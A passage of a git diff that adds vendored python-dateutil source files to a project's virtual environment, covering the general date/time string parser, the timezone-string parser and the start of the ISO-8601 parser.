+ if self[1] > 31: + # 01-99-Jan + day, year, month = self + else: + # 99-01-Jan + year, day, month = self + + else: + if (self[0] > 31 or + self.ystridx == 0 or + (yearfirst and self[1] <= 12 and self[2] <= 31)): + # 99-01-01 + if dayfirst and self[2] <= 12: + year, day, month = self + else: + year, month, day = self + elif self[0] > 12 or (dayfirst and self[1] <= 12): + # 13-01-01 + day, month, year = self + else: + # 01-13-01 + month, day, year = self + + return year, month, day + + +class parser(object): + def __init__(self, info=None): + self.info = info or parserinfo() + + def parse(self, timestr, default=None, + ignoretz=False, tzinfos=None, **kwargs): + """ + Parse the date/time string into a :class:`datetime.datetime` object. + + :param timestr: + Any date/time string using the supported formats. + + :param default: + The default datetime object, if this is a datetime object and not + ``None``, elements specified in ``timestr`` replace elements in the + default object. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a + naive :class:`datetime.datetime` object is returned. + + :param tzinfos: + Additional time zone names / aliases which may be present in the + string. This argument maps time zone names (and optionally offsets + from those time zones) to time zones. This parameter can be a + dictionary with timezone aliases mapping time zone names to time + zones or a function taking two parameters (``tzname`` and + ``tzoffset``) and returning a time zone. + + The timezones to which the names are mapped can be an integer + offset from UTC in seconds or a :class:`tzinfo` object. + + .. doctest:: + :options: +NORMALIZE_WHITESPACE + + >>> from dateutil.parser import parse + >>> from dateutil.tz import gettz + >>> tzinfos = {"BRST": -7200, "CST": gettz("America/Chicago")} + >>> parse("2012-01-19 17:21:00 BRST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, tzinfo=tzoffset(u'BRST', -7200)) + >>> parse("2012-01-19 17:21:00 CST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, + tzinfo=tzfile('/usr/share/zoneinfo/America/Chicago')) + + This parameter is ignored if ``ignoretz`` is set. + + :param \\*\\*kwargs: + Keyword arguments as passed to ``_parse()``. + + :return: + Returns a :class:`datetime.datetime` object or, if the + ``fuzzy_with_tokens`` option is ``True``, returns a tuple, the + first element being a :class:`datetime.datetime` object, the second + a tuple containing the fuzzy tokens. + + :raises ParserError: + Raised for invalid or unknown string format, if the provided + :class:`tzinfo` is not in a valid format, or if an invalid date + would be created. + + :raises TypeError: + Raised for non-string or character stream input. + + :raises OverflowError: + Raised if the parsed date exceeds the largest valid C integer on + your system. 
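A minimal sketch of the ``default`` behaviour described above: only the fields actually present in ``timestr`` override the corresponding fields of the default datetime (values shown assume the stock ``parserinfo``).

    import datetime
    from dateutil.parser import parse

    base = datetime.datetime(2003, 9, 25)
    parse("10:36", default=base)   # only hour and minute come from the string
    # -> datetime.datetime(2003, 9, 25, 10, 36)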
+ """ + + if default is None: + default = datetime.datetime.now().replace(hour=0, minute=0, + second=0, microsecond=0) + + res, skipped_tokens = self._parse(timestr, **kwargs) + + if res is None: + raise ParserError("Unknown string format: %s", timestr) + + if len(res) == 0: + raise ParserError("String does not contain a date: %s", timestr) + + try: + ret = self._build_naive(res, default) + except ValueError as e: + six.raise_from(ParserError(str(e) + ": %s", timestr), e) + + if not ignoretz: + ret = self._build_tzaware(ret, res, tzinfos) + + if kwargs.get('fuzzy_with_tokens', False): + return ret, skipped_tokens + else: + return ret + + class _result(_resultbase): + __slots__ = ["year", "month", "day", "weekday", + "hour", "minute", "second", "microsecond", + "tzname", "tzoffset", "ampm","any_unused_tokens"] + + def _parse(self, timestr, dayfirst=None, yearfirst=None, fuzzy=False, + fuzzy_with_tokens=False): + """ + Private method which performs the heavy lifting of parsing, called from + ``parse()``, which passes on its ``kwargs`` to this function. + + :param timestr: + The string to parse. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM + and YMD. If set to ``None``, this value is retrieved from the + current :class:`parserinfo` object (which itself defaults to + ``False``). + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken + to be the year, otherwise the last number is taken to be the year. + If this is set to ``None``, the value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param fuzzy: + Whether to allow fuzzy parsing, allowing for string like "Today is + January 1, 2047 at 8:21:00AM". + + :param fuzzy_with_tokens: + If ``True``, ``fuzzy`` is automatically set to True, and the parser + will return a tuple where the first element is the parsed + :class:`datetime.datetime` datetimestamp and the second element is + a tuple containing the portions of the string which were ignored: + + .. 
doctest:: + + >>> from dateutil.parser import parse + >>> parse("Today is January 1, 2047 at 8:21:00AM", fuzzy_with_tokens=True) + (datetime.datetime(2047, 1, 1, 8, 21), (u'Today is ', u' ', u'at ')) + + """ + if fuzzy_with_tokens: + fuzzy = True + + info = self.info + + if dayfirst is None: + dayfirst = info.dayfirst + + if yearfirst is None: + yearfirst = info.yearfirst + + res = self._result() + l = _timelex.split(timestr) # Splits the timestr into tokens + + skipped_idxs = [] + + # year/month/day list + ymd = _ymd() + + len_l = len(l) + i = 0 + try: + while i < len_l: + + # Check if it's a number + value_repr = l[i] + try: + value = float(value_repr) + except ValueError: + value = None + + if value is not None: + # Numeric token + i = self._parse_numeric_token(l, i, info, ymd, res, fuzzy) + + # Check weekday + elif info.weekday(l[i]) is not None: + value = info.weekday(l[i]) + res.weekday = value + + # Check month name + elif info.month(l[i]) is not None: + value = info.month(l[i]) + ymd.append(value, 'M') + + if i + 1 < len_l: + if l[i + 1] in ('-', '/'): + # Jan-01[-99] + sep = l[i + 1] + ymd.append(l[i + 2]) + + if i + 3 < len_l and l[i + 3] == sep: + # Jan-01-99 + ymd.append(l[i + 4]) + i += 2 + + i += 2 + + elif (i + 4 < len_l and l[i + 1] == l[i + 3] == ' ' and + info.pertain(l[i + 2])): + # Jan of 01 + # In this case, 01 is clearly year + if l[i + 4].isdigit(): + # Convert it here to become unambiguous + value = int(l[i + 4]) + year = str(info.convertyear(value)) + ymd.append(year, 'Y') + else: + # Wrong guess + pass + # TODO: not hit in tests + i += 4 + + # Check am/pm + elif info.ampm(l[i]) is not None: + value = info.ampm(l[i]) + val_is_ampm = self._ampm_valid(res.hour, res.ampm, fuzzy) + + if val_is_ampm: + res.hour = self._adjust_ampm(res.hour, value) + res.ampm = value + + elif fuzzy: + skipped_idxs.append(i) + + # Check for a timezone name + elif self._could_be_tzname(res.hour, res.tzname, res.tzoffset, l[i]): + res.tzname = l[i] + res.tzoffset = info.tzoffset(res.tzname) + + # Check for something like GMT+3, or BRST+3. Notice + # that it doesn't mean "I am 3 hours after GMT", but + # "my time +3 is GMT". If found, we reverse the + # logic so that timezone parsing code will get it + # right. + if i + 1 < len_l and l[i + 1] in ('+', '-'): + l[i + 1] = ('+', '-')[l[i + 1] == '+'] + res.tzoffset = None + if info.utczone(res.tzname): + # With something like GMT+3, the timezone + # is *not* GMT. + res.tzname = None + + # Check for a numbered timezone + elif res.hour is not None and l[i] in ('+', '-'): + signal = (-1, 1)[l[i] == '+'] + len_li = len(l[i + 1]) + + # TODO: check that l[i + 1] is integer? + if len_li == 4: + # -0300 + hour_offset = int(l[i + 1][:2]) + min_offset = int(l[i + 1][2:]) + elif i + 2 < len_l and l[i + 2] == ':': + # -03:00 + hour_offset = int(l[i + 1]) + min_offset = int(l[i + 3]) # TODO: Check that l[i+3] is minute-like? 
+ i += 2 + elif len_li <= 2: + # -[0]3 + hour_offset = int(l[i + 1][:2]) + min_offset = 0 + else: + raise ValueError(timestr) + + res.tzoffset = signal * (hour_offset * 3600 + min_offset * 60) + + # Look for a timezone name between parenthesis + if (i + 5 < len_l and + info.jump(l[i + 2]) and l[i + 3] == '(' and + l[i + 5] == ')' and + 3 <= len(l[i + 4]) and + self._could_be_tzname(res.hour, res.tzname, + None, l[i + 4])): + # -0300 (BRST) + res.tzname = l[i + 4] + i += 4 + + i += 1 + + # Check jumps + elif not (info.jump(l[i]) or fuzzy): + raise ValueError(timestr) + + else: + skipped_idxs.append(i) + i += 1 + + # Process year/month/day + year, month, day = ymd.resolve_ymd(yearfirst, dayfirst) + + res.century_specified = ymd.century_specified + res.year = year + res.month = month + res.day = day + + except (IndexError, ValueError): + return None, None + + if not info.validate(res): + return None, None + + if fuzzy_with_tokens: + skipped_tokens = self._recombine_skipped(l, skipped_idxs) + return res, tuple(skipped_tokens) + else: + return res, None + + def _parse_numeric_token(self, tokens, idx, info, ymd, res, fuzzy): + # Token is a number + value_repr = tokens[idx] + try: + value = self._to_decimal(value_repr) + except Exception as e: + six.raise_from(ValueError('Unknown numeric token'), e) + + len_li = len(value_repr) + + len_l = len(tokens) + + if (len(ymd) == 3 and len_li in (2, 4) and + res.hour is None and + (idx + 1 >= len_l or + (tokens[idx + 1] != ':' and + info.hms(tokens[idx + 1]) is None))): + # 19990101T23[59] + s = tokens[idx] + res.hour = int(s[:2]) + + if len_li == 4: + res.minute = int(s[2:]) + + elif len_li == 6 or (len_li > 6 and tokens[idx].find('.') == 6): + # YYMMDD or HHMMSS[.ss] + s = tokens[idx] + + if not ymd and '.' not in tokens[idx]: + ymd.append(s[:2]) + ymd.append(s[2:4]) + ymd.append(s[4:]) + else: + # 19990101T235959[.59] + + # TODO: Check if res attributes already set. + res.hour = int(s[:2]) + res.minute = int(s[2:4]) + res.second, res.microsecond = self._parsems(s[4:]) + + elif len_li in (8, 12, 14): + # YYYYMMDD + s = tokens[idx] + ymd.append(s[:4], 'Y') + ymd.append(s[4:6]) + ymd.append(s[6:8]) + + if len_li > 8: + res.hour = int(s[8:10]) + res.minute = int(s[10:12]) + + if len_li > 12: + res.second = int(s[12:]) + + elif self._find_hms_idx(idx, tokens, info, allow_jump=True) is not None: + # HH[ ]h or MM[ ]m or SS[.ss][ ]s + hms_idx = self._find_hms_idx(idx, tokens, info, allow_jump=True) + (idx, hms) = self._parse_hms(idx, tokens, info, hms_idx) + if hms is not None: + # TODO: checking that hour/minute/second are not + # already set? + self._assign_hms(res, value_repr, hms) + + elif idx + 2 < len_l and tokens[idx + 1] == ':': + # HH:MM[:SS[.ss]] + res.hour = int(value) + value = self._to_decimal(tokens[idx + 2]) # TODO: try/except for this? 
+ (res.minute, res.second) = self._parse_min_sec(value) + + if idx + 4 < len_l and tokens[idx + 3] == ':': + res.second, res.microsecond = self._parsems(tokens[idx + 4]) + + idx += 2 + + idx += 2 + + elif idx + 1 < len_l and tokens[idx + 1] in ('-', '/', '.'): + sep = tokens[idx + 1] + ymd.append(value_repr) + + if idx + 2 < len_l and not info.jump(tokens[idx + 2]): + if tokens[idx + 2].isdigit(): + # 01-01[-01] + ymd.append(tokens[idx + 2]) + else: + # 01-Jan[-01] + value = info.month(tokens[idx + 2]) + + if value is not None: + ymd.append(value, 'M') + else: + raise ValueError() + + if idx + 3 < len_l and tokens[idx + 3] == sep: + # We have three members + value = info.month(tokens[idx + 4]) + + if value is not None: + ymd.append(value, 'M') + else: + ymd.append(tokens[idx + 4]) + idx += 2 + + idx += 1 + idx += 1 + + elif idx + 1 >= len_l or info.jump(tokens[idx + 1]): + if idx + 2 < len_l and info.ampm(tokens[idx + 2]) is not None: + # 12 am + hour = int(value) + res.hour = self._adjust_ampm(hour, info.ampm(tokens[idx + 2])) + idx += 1 + else: + # Year, month or day + ymd.append(value) + idx += 1 + + elif info.ampm(tokens[idx + 1]) is not None and (0 <= value < 24): + # 12am + hour = int(value) + res.hour = self._adjust_ampm(hour, info.ampm(tokens[idx + 1])) + idx += 1 + + elif ymd.could_be_day(value): + ymd.append(value) + + elif not fuzzy: + raise ValueError() + + return idx + + def _find_hms_idx(self, idx, tokens, info, allow_jump): + len_l = len(tokens) + + if idx+1 < len_l and info.hms(tokens[idx+1]) is not None: + # There is an "h", "m", or "s" label following this token. We take + # assign the upcoming label to the current token. + # e.g. the "12" in 12h" + hms_idx = idx + 1 + + elif (allow_jump and idx+2 < len_l and tokens[idx+1] == ' ' and + info.hms(tokens[idx+2]) is not None): + # There is a space and then an "h", "m", or "s" label. + # e.g. the "12" in "12 h" + hms_idx = idx + 2 + + elif idx > 0 and info.hms(tokens[idx-1]) is not None: + # There is a "h", "m", or "s" preceding this token. Since neither + # of the previous cases was hit, there is no label following this + # token, so we use the previous label. + # e.g. the "04" in "12h04" + hms_idx = idx-1 + + elif (1 < idx == len_l-1 and tokens[idx-1] == ' ' and + info.hms(tokens[idx-2]) is not None): + # If we are looking at the final token, we allow for a + # backward-looking check to skip over a space. + # TODO: Are we sure this is the right condition here? + hms_idx = idx - 2 + + else: + hms_idx = None + + return hms_idx + + def _assign_hms(self, res, value_repr, hms): + # See GH issue #427, fixing float rounding + value = self._to_decimal(value_repr) + + if hms == 0: + # Hour + res.hour = int(value) + if value % 1: + res.minute = int(60*(value % 1)) + + elif hms == 1: + (res.minute, res.second) = self._parse_min_sec(value) + + elif hms == 2: + (res.second, res.microsecond) = self._parsems(value_repr) + + def _could_be_tzname(self, hour, tzname, tzoffset, token): + return (hour is not None and + tzname is None and + tzoffset is None and + len(token) <= 5 and + (all(x in string.ascii_uppercase for x in token) + or token in self.info.UTCZONE)) + + def _ampm_valid(self, hour, ampm, fuzzy): + """ + For fuzzy parsing, 'a' or 'am' (both valid English words) + may erroneously trigger the AM/PM flag. Deal with that + here. + """ + val_is_ampm = True + + # If there's already an AM/PM flag, this one isn't one. 
+ if fuzzy and ampm is not None: + val_is_ampm = False + + # If AM/PM is found and hour is not, raise a ValueError + if hour is None: + if fuzzy: + val_is_ampm = False + else: + raise ValueError('No hour specified with AM or PM flag.') + elif not 0 <= hour <= 12: + # If AM/PM is found, it's a 12 hour clock, so raise + # an error for invalid range + if fuzzy: + val_is_ampm = False + else: + raise ValueError('Invalid hour specified for 12-hour clock.') + + return val_is_ampm + + def _adjust_ampm(self, hour, ampm): + if hour < 12 and ampm == 1: + hour += 12 + elif hour == 12 and ampm == 0: + hour = 0 + return hour + + def _parse_min_sec(self, value): + # TODO: Every usage of this function sets res.second to the return + # value. Are there any cases where second will be returned as None and + # we *don't* want to set res.second = None? + minute = int(value) + second = None + + sec_remainder = value % 1 + if sec_remainder: + second = int(60 * sec_remainder) + return (minute, second) + + def _parse_hms(self, idx, tokens, info, hms_idx): + # TODO: Is this going to admit a lot of false-positives for when we + # just happen to have digits and "h", "m" or "s" characters in non-date + # text? I guess hex hashes won't have that problem, but there's plenty + # of random junk out there. + if hms_idx is None: + hms = None + new_idx = idx + elif hms_idx > idx: + hms = info.hms(tokens[hms_idx]) + new_idx = hms_idx + else: + # Looking backwards, increment one. + hms = info.hms(tokens[hms_idx]) + 1 + new_idx = idx + + return (new_idx, hms) + + # ------------------------------------------------------------------ + # Handling for individual tokens. These are kept as methods instead + # of functions for the sake of customizability via subclassing. + + def _parsems(self, value): + """Parse a I[.F] seconds value into (seconds, microseconds).""" + if "." not in value: + return int(value), 0 + else: + i, f = value.split(".") + return int(i), int(f.ljust(6, "0")[:6]) + + def _to_decimal(self, val): + try: + decimal_value = Decimal(val) + # See GH 662, edge case, infinite value should not be converted + # via `_to_decimal` + if not decimal_value.is_finite(): + raise ValueError("Converted decimal value is infinite or NaN") + except Exception as e: + msg = "Could not convert %s to decimal" % val + six.raise_from(ValueError(msg), e) + else: + return decimal_value + + # ------------------------------------------------------------------ + # Post-Parsing construction of datetime output. These are kept as + # methods instead of functions for the sake of customizability via + # subclassing. 
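A minimal sketch of the callable form of ``tzinfos`` that ``_build_tzinfo`` below accepts; the abbreviation table used here is illustrative only, and offsets are seconds east of UTC as stated in the ``parse`` docstring.

    from dateutil.parser import parse

    def lookup(tzname, tzoffset):
        # may return an int offset in seconds, a tzinfo object, or None
        offsets = {"BRST": -7200, "EST": -18000}
        return offsets.get(tzname)

    parse("2012-01-19 17:21:00 BRST", tzinfos=lookup)
    # -> an aware datetime carrying tzoffset('BRST', -7200)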
+ + def _build_tzinfo(self, tzinfos, tzname, tzoffset): + if callable(tzinfos): + tzdata = tzinfos(tzname, tzoffset) + else: + tzdata = tzinfos.get(tzname) + # handle case where tzinfo is paased an options that returns None + # eg tzinfos = {'BRST' : None} + if isinstance(tzdata, datetime.tzinfo) or tzdata is None: + tzinfo = tzdata + elif isinstance(tzdata, text_type): + tzinfo = tz.tzstr(tzdata) + elif isinstance(tzdata, integer_types): + tzinfo = tz.tzoffset(tzname, tzdata) + else: + raise TypeError("Offset must be tzinfo subclass, tz string, " + "or int offset.") + return tzinfo + + def _build_tzaware(self, naive, res, tzinfos): + if (callable(tzinfos) or (tzinfos and res.tzname in tzinfos)): + tzinfo = self._build_tzinfo(tzinfos, res.tzname, res.tzoffset) + aware = naive.replace(tzinfo=tzinfo) + aware = self._assign_tzname(aware, res.tzname) + + elif res.tzname and res.tzname in time.tzname: + aware = naive.replace(tzinfo=tz.tzlocal()) + + # Handle ambiguous local datetime + aware = self._assign_tzname(aware, res.tzname) + + # This is mostly relevant for winter GMT zones parsed in the UK + if (aware.tzname() != res.tzname and + res.tzname in self.info.UTCZONE): + aware = aware.replace(tzinfo=tz.UTC) + + elif res.tzoffset == 0: + aware = naive.replace(tzinfo=tz.UTC) + + elif res.tzoffset: + aware = naive.replace(tzinfo=tz.tzoffset(res.tzname, res.tzoffset)) + + elif not res.tzname and not res.tzoffset: + # i.e. no timezone information was found. + aware = naive + + elif res.tzname: + # tz-like string was parsed but we don't know what to do + # with it + warnings.warn("tzname {tzname} identified but not understood. " + "Pass `tzinfos` argument in order to correctly " + "return a timezone-aware datetime. In a future " + "version, this will raise an " + "exception.".format(tzname=res.tzname), + category=UnknownTimezoneWarning) + aware = naive + + return aware + + def _build_naive(self, res, default): + repl = {} + for attr in ("year", "month", "day", "hour", + "minute", "second", "microsecond"): + value = getattr(res, attr) + if value is not None: + repl[attr] = value + + if 'day' not in repl: + # If the default day exceeds the last day of the month, fall back + # to the end of the month. + cyear = default.year if res.year is None else res.year + cmonth = default.month if res.month is None else res.month + cday = default.day if res.day is None else res.day + + if cday > monthrange(cyear, cmonth)[1]: + repl['day'] = monthrange(cyear, cmonth)[1] + + naive = default.replace(**repl) + + if res.weekday is not None and not res.day: + naive = naive + relativedelta.relativedelta(weekday=res.weekday) + + return naive + + def _assign_tzname(self, dt, tzname): + if dt.tzname() != tzname: + new_dt = tz.enfold(dt, fold=1) + if new_dt.tzname() == tzname: + return new_dt + + return dt + + def _recombine_skipped(self, tokens, skipped_idxs): + """ + >>> tokens = ["foo", " ", "bar", " ", "19June2000", "baz"] + >>> skipped_idxs = [0, 1, 2, 5] + >>> _recombine_skipped(tokens, skipped_idxs) + ["foo bar", "baz"] + """ + skipped_tokens = [] + for i, idx in enumerate(sorted(skipped_idxs)): + if i > 0 and idx - 1 == skipped_idxs[i - 1]: + skipped_tokens[-1] = skipped_tokens[-1] + tokens[idx] + else: + skipped_tokens.append(tokens[idx]) + + return skipped_tokens + + +DEFAULTPARSER = parser() + + +def parse(timestr, parserinfo=None, **kwargs): + """ + + Parse a string in one of the supported formats, using the + ``parserinfo`` parameters. + + :param timestr: + A string containing a date/time stamp. 
+ + :param parserinfo: + A :class:`parserinfo` object containing parameters for the parser. + If ``None``, the default arguments to the :class:`parserinfo` + constructor are used. + + The ``**kwargs`` parameter takes the following keyword arguments: + + :param default: + The default datetime object, if this is a datetime object and not + ``None``, elements specified in ``timestr`` replace elements in the + default object. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a naive + :class:`datetime` object is returned. + + :param tzinfos: + Additional time zone names / aliases which may be present in the + string. This argument maps time zone names (and optionally offsets + from those time zones) to time zones. This parameter can be a + dictionary with timezone aliases mapping time zone names to time + zones or a function taking two parameters (``tzname`` and + ``tzoffset``) and returning a time zone. + + The timezones to which the names are mapped can be an integer + offset from UTC in seconds or a :class:`tzinfo` object. + + .. doctest:: + :options: +NORMALIZE_WHITESPACE + + >>> from dateutil.parser import parse + >>> from dateutil.tz import gettz + >>> tzinfos = {"BRST": -7200, "CST": gettz("America/Chicago")} + >>> parse("2012-01-19 17:21:00 BRST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, tzinfo=tzoffset(u'BRST', -7200)) + >>> parse("2012-01-19 17:21:00 CST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, + tzinfo=tzfile('/usr/share/zoneinfo/America/Chicago')) + + This parameter is ignored if ``ignoretz`` is set. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM and + YMD. If set to ``None``, this value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken to + be the year, otherwise the last number is taken to be the year. If + this is set to ``None``, the value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param fuzzy: + Whether to allow fuzzy parsing, allowing for string like "Today is + January 1, 2047 at 8:21:00AM". + + :param fuzzy_with_tokens: + If ``True``, ``fuzzy`` is automatically set to True, and the parser + will return a tuple where the first element is the parsed + :class:`datetime.datetime` datetimestamp and the second element is + a tuple containing the portions of the string which were ignored: + + .. doctest:: + + >>> from dateutil.parser import parse + >>> parse("Today is January 1, 2047 at 8:21:00AM", fuzzy_with_tokens=True) + (datetime.datetime(2047, 1, 1, 8, 21), (u'Today is ', u' ', u'at ')) + + :return: + Returns a :class:`datetime.datetime` object or, if the + ``fuzzy_with_tokens`` option is ``True``, returns a tuple, the + first element being a :class:`datetime.datetime` object, the second + a tuple containing the fuzzy tokens. + + :raises ParserError: + Raised for invalid or unknown string formats, if the provided + :class:`tzinfo` is not in a valid format, or if an invalid date would + be created. + + :raises OverflowError: + Raised if the parsed date exceeds the largest valid C integer on + your system. 
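A minimal sketch of the error handling implied by the ``:raises:`` entries above. ``ParserError`` is defined near the end of this module and subclasses ``ValueError``; the import below assumes the package ``__init__`` re-exports it, as released dateutil does.

    from dateutil.parser import parse, ParserError

    try:
        parse("not a date")
    except ParserError as exc:   # also caught by a plain `except ValueError`
        print("could not parse:", exc)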
+ """ + if parserinfo: + return parser(parserinfo).parse(timestr, **kwargs) + else: + return DEFAULTPARSER.parse(timestr, **kwargs) + + +class _tzparser(object): + + class _result(_resultbase): + + __slots__ = ["stdabbr", "stdoffset", "dstabbr", "dstoffset", + "start", "end"] + + class _attr(_resultbase): + __slots__ = ["month", "week", "weekday", + "yday", "jyday", "day", "time"] + + def __repr__(self): + return self._repr("") + + def __init__(self): + _resultbase.__init__(self) + self.start = self._attr() + self.end = self._attr() + + def parse(self, tzstr): + res = self._result() + l = [x for x in re.split(r'([,:.]|[a-zA-Z]+|[0-9]+)',tzstr) if x] + used_idxs = list() + try: + + len_l = len(l) + + i = 0 + while i < len_l: + # BRST+3[BRDT[+2]] + j = i + while j < len_l and not [x for x in l[j] + if x in "0123456789:,-+"]: + j += 1 + if j != i: + if not res.stdabbr: + offattr = "stdoffset" + res.stdabbr = "".join(l[i:j]) + else: + offattr = "dstoffset" + res.dstabbr = "".join(l[i:j]) + + for ii in range(j): + used_idxs.append(ii) + i = j + if (i < len_l and (l[i] in ('+', '-') or l[i][0] in + "0123456789")): + if l[i] in ('+', '-'): + # Yes, that's right. See the TZ variable + # documentation. + signal = (1, -1)[l[i] == '+'] + used_idxs.append(i) + i += 1 + else: + signal = -1 + len_li = len(l[i]) + if len_li == 4: + # -0300 + setattr(res, offattr, (int(l[i][:2]) * 3600 + + int(l[i][2:]) * 60) * signal) + elif i + 1 < len_l and l[i + 1] == ':': + # -03:00 + setattr(res, offattr, + (int(l[i]) * 3600 + + int(l[i + 2]) * 60) * signal) + used_idxs.append(i) + i += 2 + elif len_li <= 2: + # -[0]3 + setattr(res, offattr, + int(l[i][:2]) * 3600 * signal) + else: + return None + used_idxs.append(i) + i += 1 + if res.dstabbr: + break + else: + break + + + if i < len_l: + for j in range(i, len_l): + if l[j] == ';': + l[j] = ',' + + assert l[i] == ',' + + i += 1 + + if i >= len_l: + pass + elif (8 <= l.count(',') <= 9 and + not [y for x in l[i:] if x != ',' + for y in x if y not in "0123456789+-"]): + # GMT0BST,3,0,30,3600,10,0,26,7200[,3600] + for x in (res.start, res.end): + x.month = int(l[i]) + used_idxs.append(i) + i += 2 + if l[i] == '-': + value = int(l[i + 1]) * -1 + used_idxs.append(i) + i += 1 + else: + value = int(l[i]) + used_idxs.append(i) + i += 2 + if value: + x.week = value + x.weekday = (int(l[i]) - 1) % 7 + else: + x.day = int(l[i]) + used_idxs.append(i) + i += 2 + x.time = int(l[i]) + used_idxs.append(i) + i += 2 + if i < len_l: + if l[i] in ('-', '+'): + signal = (-1, 1)[l[i] == "+"] + used_idxs.append(i) + i += 1 + else: + signal = 1 + used_idxs.append(i) + res.dstoffset = (res.stdoffset + int(l[i]) * signal) + + # This was a made-up format that is not in normal use + warn(('Parsed time zone "%s"' % tzstr) + + 'is in a non-standard dateutil-specific format, which ' + + 'is now deprecated; support for parsing this format ' + + 'will be removed in future versions. 
It is recommended ' + + 'that you switch to a standard format like the GNU ' + + 'TZ variable format.', tz.DeprecatedTzFormatWarning) + elif (l.count(',') == 2 and l[i:].count('/') <= 2 and + not [y for x in l[i:] if x not in (',', '/', 'J', 'M', + '.', '-', ':') + for y in x if y not in "0123456789"]): + for x in (res.start, res.end): + if l[i] == 'J': + # non-leap year day (1 based) + used_idxs.append(i) + i += 1 + x.jyday = int(l[i]) + elif l[i] == 'M': + # month[-.]week[-.]weekday + used_idxs.append(i) + i += 1 + x.month = int(l[i]) + used_idxs.append(i) + i += 1 + assert l[i] in ('-', '.') + used_idxs.append(i) + i += 1 + x.week = int(l[i]) + if x.week == 5: + x.week = -1 + used_idxs.append(i) + i += 1 + assert l[i] in ('-', '.') + used_idxs.append(i) + i += 1 + x.weekday = (int(l[i]) - 1) % 7 + else: + # year day (zero based) + x.yday = int(l[i]) + 1 + + used_idxs.append(i) + i += 1 + + if i < len_l and l[i] == '/': + used_idxs.append(i) + i += 1 + # start time + len_li = len(l[i]) + if len_li == 4: + # -0300 + x.time = (int(l[i][:2]) * 3600 + + int(l[i][2:]) * 60) + elif i + 1 < len_l and l[i + 1] == ':': + # -03:00 + x.time = int(l[i]) * 3600 + int(l[i + 2]) * 60 + used_idxs.append(i) + i += 2 + if i + 1 < len_l and l[i + 1] == ':': + used_idxs.append(i) + i += 2 + x.time += int(l[i]) + elif len_li <= 2: + # -[0]3 + x.time = (int(l[i][:2]) * 3600) + else: + return None + used_idxs.append(i) + i += 1 + + assert i == len_l or l[i] == ',' + + i += 1 + + assert i >= len_l + + except (IndexError, ValueError, AssertionError): + return None + + unused_idxs = set(range(len_l)).difference(used_idxs) + res.any_unused_tokens = not {l[n] for n in unused_idxs}.issubset({",",":"}) + return res + + +DEFAULTTZPARSER = _tzparser() + + +def _parsetz(tzstr): + return DEFAULTTZPARSER.parse(tzstr) + + +class ParserError(ValueError): + """Exception subclass used for any failure to parse a datetime string. + + This is a subclass of :py:exc:`ValueError`, and should be raised any time + earlier versions of ``dateutil`` would have raised ``ValueError``. + + .. versionadded:: 2.8.1 + """ + def __str__(self): + try: + return self.args[0] % self.args[1:] + except (TypeError, IndexError): + return super(ParserError, self).__str__() + + def __repr__(self): + args = ", ".join("'%s'" % arg for arg in self.args) + return "%s(%s)" % (self.__class__.__name__, args) + + +class UnknownTimezoneWarning(RuntimeWarning): + """Raised when the parser finds a timezone it cannot parse into a tzinfo. + + .. versionadded:: 2.7.0 + """ +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/parser/isoparser.py b/env/Lib/site-packages/dateutil/parser/isoparser.py new file mode 100644 index 00000000..5d7bee38 --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/isoparser.py @@ -0,0 +1,416 @@ +# -*- coding: utf-8 -*- +""" +This module offers a parser for ISO-8601 strings + +It is intended to support all valid date, time and datetime formats per the +ISO-8601 specification. 
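A minimal sketch of the module-level ``isoparse`` helper exported below, showing one common and one ISO week-date form; results assume the default ``isoparser`` with no separator restriction.

    from dateutil.parser.isoparser import isoparse

    isoparse("2018-04-09T13:37:00+00:00")   # zero offset is returned as tzutc()
    isoparse("2018-W15-1")                   # ISO week date -> datetime(2018, 4, 9, 0, 0)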
+ +..versionadded:: 2.7.0 +""" +from datetime import datetime, timedelta, time, date +import calendar +from dateutil import tz + +from functools import wraps + +import re +import six + +__all__ = ["isoparse", "isoparser"] + + +def _takes_ascii(f): + @wraps(f) + def func(self, str_in, *args, **kwargs): + # If it's a stream, read the whole thing + str_in = getattr(str_in, 'read', lambda: str_in)() + + # If it's unicode, turn it into bytes, since ISO-8601 only covers ASCII + if isinstance(str_in, six.text_type): + # ASCII is the same in UTF-8 + try: + str_in = str_in.encode('ascii') + except UnicodeEncodeError as e: + msg = 'ISO-8601 strings should contain only ASCII characters' + six.raise_from(ValueError(msg), e) + + return f(self, str_in, *args, **kwargs) + + return func + + +class isoparser(object): + def __init__(self, sep=None): + """ + :param sep: + A single character that separates date and time portions. If + ``None``, the parser will accept any single character. + For strict ISO-8601 adherence, pass ``'T'``. + """ + if sep is not None: + if (len(sep) != 1 or ord(sep) >= 128 or sep in '0123456789'): + raise ValueError('Separator must be a single, non-numeric ' + + 'ASCII character') + + sep = sep.encode('ascii') + + self._sep = sep + + @_takes_ascii + def isoparse(self, dt_str): + """ + Parse an ISO-8601 datetime string into a :class:`datetime.datetime`. + + An ISO-8601 datetime string consists of a date portion, followed + optionally by a time portion - the date and time portions are separated + by a single character separator, which is ``T`` in the official + standard. Incomplete date formats (such as ``YYYY-MM``) may *not* be + combined with a time portion. + + Supported date formats are: + + Common: + + - ``YYYY`` + - ``YYYY-MM`` or ``YYYYMM`` + - ``YYYY-MM-DD`` or ``YYYYMMDD`` + + Uncommon: + + - ``YYYY-Www`` or 